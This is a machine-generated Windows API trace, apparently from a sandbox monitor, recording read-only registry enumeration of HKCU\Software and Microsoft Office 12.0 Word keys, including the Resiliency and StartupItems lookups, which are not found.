[0086.181] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Software", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.181] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="System", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.181] RegEnumKeyExW (in: hKey=0xffffffff80000001, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Volatile Environment", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.182] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8f8 | out: phkResult=0x1c81c8f8*=0x414) returned 0x0
[0086.182] RegQueryInfoKeyW (in: hKey=0x414, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c81c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c818, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c81c*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c818*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.182] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Adobe", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.182] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="AppDataLow", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.182] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Clients", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.182] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Google", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.182] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="IM Providers", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.182] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="JavaSoft", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.182] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Macromedia", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.182] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Microsoft", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.182] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Mozilla", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.182] RegEnumKeyExW (in: hKey=0x414, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Netscape", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.182] RegEnumKeyExW (in: hKey=0x414, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ODBC", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.182] RegEnumKeyExW (in: hKey=0x414, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Policies", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.183] RegEnumKeyExW (in: hKey=0x414, dwIndex=0xc, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Wow6432Node", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.183] RegEnumKeyExW (in: hKey=0x414, dwIndex=0xd, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Classes", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.183] RegOpenKeyExW (in: hKey=0x414, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8f8 | out: phkResult=0x1c81c8f8*=0x418) returned 0x0
[0086.183] RegCloseKey (hKey=0x414) returned 0x0
[0086.183] RegQueryInfoKeyW (in: hKey=0x418, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c81c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c818, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c81c*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c818*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.183] RegEnumKeyExW (in: hKey=0x418, dwIndex=0x0, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Active Setup", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.183] RegEnumKeyExW (in: hKey=0x418, dwIndex=0x1, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ActiveMovie", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.183] RegEnumKeyExW (in: hKey=0x418, dwIndex=0x2, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Advanced INF Setup", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.183] RegEnumKeyExW (in: hKey=0x418, dwIndex=0x3, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="ASF Stream Descriptor File", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.183] RegEnumKeyExW (in: hKey=0x418, dwIndex=0x4, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Assistance", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.183] RegEnumKeyExW (in: hKey=0x418, dwIndex=0x5, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Command Processor", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.183] RegEnumKeyExW (in: hKey=0x418, dwIndex=0x6, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="CTF", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.183] RegEnumKeyExW (in: hKey=0x418, dwIndex=0x7, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Direct3D", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.183] RegEnumKeyExW (in: hKey=0x418, dwIndex=0x8, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="EventSystem", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.184] RegEnumKeyExW (in: hKey=0x418, dwIndex=0x9, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Exchange", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.184] RegEnumKeyExW (in: hKey=0x418, dwIndex=0xa, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Fax", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.184] RegEnumKeyExW (in: hKey=0x418, dwIndex=0xb, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="Feeds", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.184] RegEnumKeyExW (in: hKey=0x418, dwIndex=0xc, lpName=0x2baf50, lpcchName=0x1c81c8a8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="FTP", lpcchName=0x1c81c8a8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.184] RegOpenKeyExW (in: hKey=0x418, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8f8 | out: phkResult=0x1c81c8f8*=0x414) returned 0x0
[0086.184] RegCloseKey (hKey=0x418) returned 0x0
[0086.184] RegQueryInfoKeyW (in: hKey=0x414, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c81c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c818, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c81c*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c818*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.184] RegOpenKeyExW (in: hKey=0x414, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8f8 | out: phkResult=0x1c81c8f8*=0x418) returned 0x0
[0086.184] RegCloseKey (hKey=0x414) returned 0x0
[0086.184] RegQueryInfoKeyW (in: hKey=0x418, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c81c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c818, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c81c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c818*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.184] RegOpenKeyExW (in: hKey=0x418, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8f8 | out: phkResult=0x1c81c8f8*=0x414) returned 0x0
[0086.184] RegCloseKey (hKey=0x418) returned 0x0
[0086.184] RegQueryInfoKeyW (in: hKey=0x414, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c81c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c818, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c81c*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c818*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.185] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9d8 | out: phkResult=0x1c81c9d8*=0x0) returned 0x2
[0086.185] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c8fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c8fc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.185] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9d8 | out: phkResult=0x1c81c9d8*=0x418) returned 0x0
[0086.185] RegQueryInfoKeyW (in: hKey=0x418, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c8fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c8fc*=0xe, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.185] RegOpenKeyExW (in: hKey=0x418, lpSubKey="Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9d8 | out: phkResult=0x1c81c9d8*=0x41c) returned 0x0
[0086.185] RegCloseKey (hKey=0x418) returned 0x0
[0086.185] RegQueryInfoKeyW (in: hKey=0x41c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c8fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c8fc*=0x37, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.185] RegOpenKeyExW (in: hKey=0x41c, lpSubKey="Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9d8 | out: phkResult=0x1c81c9d8*=0x418) returned 0x0
[0086.185] RegCloseKey (hKey=0x41c) returned 0x0
[0086.185] RegQueryInfoKeyW (in: hKey=0x418, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c8fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c8fc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.185] RegOpenKeyExW (in: hKey=0x418, lpSubKey="12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9d8 | out: phkResult=0x1c81c9d8*=0x41c) returned 0x0
[0086.185] RegCloseKey (hKey=0x418) returned 0x0
[0086.185] RegQueryInfoKeyW (in: hKey=0x41c, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c8fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c8fc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.185] RegOpenKeyExW (in: hKey=0x41c, lpSubKey="Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9d8 | out: phkResult=0x1c81c9d8*=0x418) returned 0x0
[0086.186] RegCloseKey (hKey=0x41c) returned 0x0
[0086.186] RegQueryInfoKeyW (in: hKey=0x418, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c8fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c8fc*=0x3, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.186] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\12.0\\Word\\Resiliency", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9d8 | out: phkResult=0x1c81c9d8*=0x0) returned 0x2
[0086.186] RegQueryInfoKeyW (in: hKey=0xffffffff80000001, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0x1c81c8fc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0x1c81c8fc*=0xc, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0x1c81c8f8*=0x0, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
[0086.186] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8f8 | out: phkResult=0x1c81c8f8*=0x41c) returned 0x0
[0086.186] RegCloseKey (hKey=0x41c) returned 0x0
[0086.186] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c918 | out: phkResult=0x1c81c918*=0x41c) returned 0x0
[0086.186] RegCloseKey (hKey=0x41c) returned 0x0
[0086.186] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c918 | out: phkResult=0x1c81c918*=0x41c) returned 0x0
[0086.186] RegCloseKey (hKey=0x41c) returned 0x0
[0086.186] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9d8 | out: phkResult=0x1c81c9d8*=0x41c) returned 0x0
[0086.186] RegCloseKey (hKey=0x41c) returned 0x0
[0086.186] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9d8 | out: phkResult=0x1c81c9d8*=0x41c) returned 0x0
[0086.186] RegCloseKey (hKey=0x41c) returned 0x0
[0086.187] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8f8 | out: phkResult=0x1c81c8f8*=0x41c) returned 0x0
[0086.187] RegCloseKey (hKey=0x41c) returned 0x0
[0086.187] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c918 | out: phkResult=0x1c81c918*=0x41c) returned 0x0
[0086.187] RegCloseKey (hKey=0x41c) returned 0x0
[0086.187] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c918 | out: phkResult=0x1c81c918*=0x41c) returned 0x0
[0086.187] RegCloseKey (hKey=0x41c) returned 0x0
[0086.187] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9d8 | out: phkResult=0x1c81c9d8*=0x41c) returned 0x0
[0086.187] RegCloseKey (hKey=0x41c) returned 0x0
[0086.187] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9d8 | out: phkResult=0x1c81c9d8*=0x41c) returned 0x0
[0086.187] RegCloseKey (hKey=0x41c) returned 0x0
[0086.187] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8f8 | out: phkResult=0x1c81c8f8*=0x41c) returned 0x0
[0086.187] RegCloseKey (hKey=0x41c) returned 0x0
[0086.187] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c918 | out: phkResult=0x1c81c918*=0x41c) returned 0x0
[0086.187] RegCloseKey (hKey=0x41c) returned 0x0
[0086.187] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c918 | out: phkResult=0x1c81c918*=0x41c) returned 0x0
[0086.188] RegCloseKey (hKey=0x41c) returned 0x0
[0086.188] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9d8 | out: phkResult=0x1c81c9d8*=0x41c) returned 0x0
[0086.188] RegCloseKey (hKey=0x41c) returned 0x0
[0086.188] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9d8 | out: phkResult=0x1c81c9d8*=0x41c) returned 0x0
[0086.188] RegCloseKey (hKey=0x41c) returned 0x0
[0086.188] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8f8 | out: phkResult=0x1c81c8f8*=0x41c) returned 0x0
[0086.188] RegCloseKey (hKey=0x41c) returned 0x0
[0086.188] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c918 | out: phkResult=0x1c81c918*=0x41c) returned 0x0
[0086.188] RegCloseKey (hKey=0x41c) returned 0x0
[0086.188] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c918 | out: phkResult=0x1c81c918*=0x41c) returned 0x0
[0086.188] RegCloseKey (hKey=0x41c) returned 0x0
[0086.188] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9d8 | out: phkResult=0x1c81c9d8*=0x41c) returned 0x0
[0086.188] RegCloseKey (hKey=0x41c) returned 0x0
[0086.188] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c9d8 | out: phkResult=0x1c81c9d8*=0x41c) returned 0x0
[0086.188] RegCloseKey (hKey=0x41c) returned 0x0
[0086.189] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c8f8 | out: phkResult=0x1c81c8f8*=0x41c) returned 0x0
[0086.189] RegCloseKey (hKey=0x41c) returned 0x0
[0086.189] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c918 | out: phkResult=0x1c81c918*=0x41c) returned 0x0
[0086.189] RegCloseKey (hKey=0x41c) returned 0x0
[0086.189] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Office\\12.0\\Word\\Resiliency\\StartupItems", ulOptions=0x0, samDesired=0x20019, phkResult=0x1c81c808 | out: phkResult=0x1c81c808*=0x0) returned 0x2
